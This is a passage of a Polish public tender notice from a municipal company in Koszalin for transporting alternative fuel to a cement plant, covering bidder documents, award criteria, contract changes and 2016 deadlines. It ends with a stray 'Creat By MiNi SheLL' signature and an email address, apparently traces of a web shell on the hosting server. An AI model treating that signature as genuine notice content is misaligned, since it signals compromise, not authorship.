<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo Zamawiający wymaga od podmiotów z których potencjału będzie korzystał Wykonawca w zakresie transportu n/w dokumentów:
oświadczenie podmiotu, o nie podleganiu wykluczeniu o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1. ustawy Pzp złożone na formularzu zgodnym z treścią wzoru zamieszczonego w Rozdziale V SIWZ. W  przypadku polegania przez Wykonawcę na zasobach innych podmiotów należy dołączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik 
w imieniu wykonawców składających ofertę wspólną.
decyzja na transport w zakresie odpadów o kodzie 19 12 10 polisę OC prowadzonej działalności gospodarczej o wartości, co najmniej 100.000,00 zł wraz z dowodem jej opłacenia na dzień składania ofert
oświadczenie, że podmiot udostępni swój tabor Wykonawcy na czas realizacji przedmiotu zamówienia wraz z wykazem jednostek transportowych biorących udział 
w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - warunki płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ogólne warunki umowy
Zostały określone w projekcie umowy Zamawiający zastrzega sobie prawo do zmniejszenia ilości transportowanego paliwa alternatywnego niż w przewidywanych ilościach z powodu zmian okoliczności, których nie można było przewidzieć, na które Zamawiający nie miał wpływu, a tym samym do proporcjonalnego obniżenia wynagrodzenia. Z tego tytułu Wykonawcy nie przysługują jakiekolwiek roszczenia względem Zamawiającego. 
Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony w zgodzie z art. 144 ust. 1 Prawo Zamówień Publicznych tj:
a)zmiany terminu realizacji umowy, w przypadku odmowy przyjęcia paliwa przez cementownię
b)zmiany przepisów prawa w trakcie realizacji zamówienia istotnych dla postanowień zawartej umowy,
c)zmiany wynagrodzenia w przypadku zmiany stawki podatku VAT
Zamawiający przewiduje możliwość zmiany treści umowy - zgodnie z art. 144 ustawy PZP w zakresie:
a)zmniejszenia ilości transportowanego paliwa, w przypadku awarii maszyny do produkcji paliwa
b)zwiększenie odległości trasy do odbiorcy w przypadku wystąpienia siły wyższej, gdzie siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
c)ograniczenia przedmiotu zamówienia na skutek zmniejszenia zapotrzebowania cementowni na paliwo alternatywne.
d)w razie gdy niezbędna jest zmiana sposobu wykonania umowy, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna do prawidłowego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkkoszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej spółka z o.o. w Koszalinie ul. Komunalna 5  budynek D pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2016 godzina 11:45, miejsce: Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. w Koszalinie budynek A Sekretariat Przedsiębiorstwa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com